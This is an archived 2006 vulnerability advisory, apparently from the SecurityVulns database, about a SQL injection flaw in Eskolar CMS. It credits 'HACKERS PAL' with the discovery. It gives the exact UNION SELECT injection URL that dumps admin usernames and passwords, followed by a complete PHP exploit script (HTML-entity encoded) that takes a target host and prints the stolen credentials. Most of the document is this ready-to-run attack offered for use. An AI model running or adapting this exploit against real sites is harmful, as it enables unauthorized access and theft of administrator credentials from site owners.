Eskolar CMS Remote Sql Injection

2006-09-23T00:00:00
ID SECURITYVULNS:DOC:14394
Type securityvulns
Reporter Securityvulns
Modified 2006-09-23T00:00:00

Description

Hello,,

Eskolar CMS Remote Sql Injection

Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net

Remote Sql injection :- /index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*

Exploit:

!/usr/bin/php -q -d short_open_tag=on

<? / / Eskolar CMS Remote sql injection exploit / By : HACKERS PAL / WwW.SoQoR.NeT / print_r(' /*******/ / Eskolar CMS Remote sql injection exploit / / by HACKERS PAL <security@soqor.net> / / site: http://www.soqor.net /'); if ($argc<2) { print_r(' / -- / / Usage: php '.$argv[0].' host / Example: / /* php '.$argv[0].' http://localhost/eskolar/ /*******/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5);

$url=$argv[1]; $exploit="/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*"; $page=$url.$exploit; Function get_page($url) {

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }
     $i=0;

     function get&#40;$var&#41;
     {
      GLOBAL $i;
       $var[1]=trim&#40;$var[1]&#41;;
      if&#40;$i==0&#41;
      {
      Echo &quot;&#92;n[+] User Name : &quot;.$var[1];
     $i++;
      }
      else
      {
      Echo &quot;&#92;n[+] Pass Word : &quot;.$var[1];
              }


     }

 $page = get_page&#40;$page&#41;;

 if&#40;!preg_match&#40;&#39;/&#92;&lt;tr bgcolor=&#92;&#39;#FF0000&#92;&#39;&gt;&lt;td&gt;&lt;div align=&#92;&#39;center&#92;&#39;&gt;&#40;.+?&#41;&lt;&#92;/div&gt;&lt;&#92;/td&gt;&lt;&#92;/tr&gt;/is&#39;,$page&#41;||!preg_match&#40;&#39;/&#92;&lt;td&gt;&lt;a href=&#92;&quot;&#40;.+?&#41;&#92;&quot; target=&#92;&quot;_blank&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/a&gt; &lt;&#92;/td&gt;/is&#39;,$page&#41;&#41;
 {
          Die&#40;&quot;&#92;n[-] Exploit Failed&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;
 }

 preg_replace_callback&#40;&#39;/&#92;&lt;tr bgcolor=&#92;&#39;#FF0000&#92;&#39;&gt;&lt;td&gt;&lt;div align=&#92;&#39;center&#92;&#39;&gt;&#40;.+?&#41;&lt;&#92;/div&gt;&lt;&#92;/td&gt;&lt;&#92;/tr&gt;/is&#39;,&#39;get&#39;,$page&#41;;

 preg_replace_callback&#40;&#39;/&#92;&lt;td&gt;&lt;a href=&#92;&quot;&#40;.+?&#41;&#92;&quot; target=&#92;&quot;_blank&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/a&gt; &lt;&#92;/td&gt;/is&#39;,&#39;get&#39;,$page&#41;;

          Die&#40;&quot;&#92;n/*       Visit us : WwW.SoQoR.NeT             */&#92;n/**********************************************/&quot;&#41;;

?>

WwW.SoQoR.NeT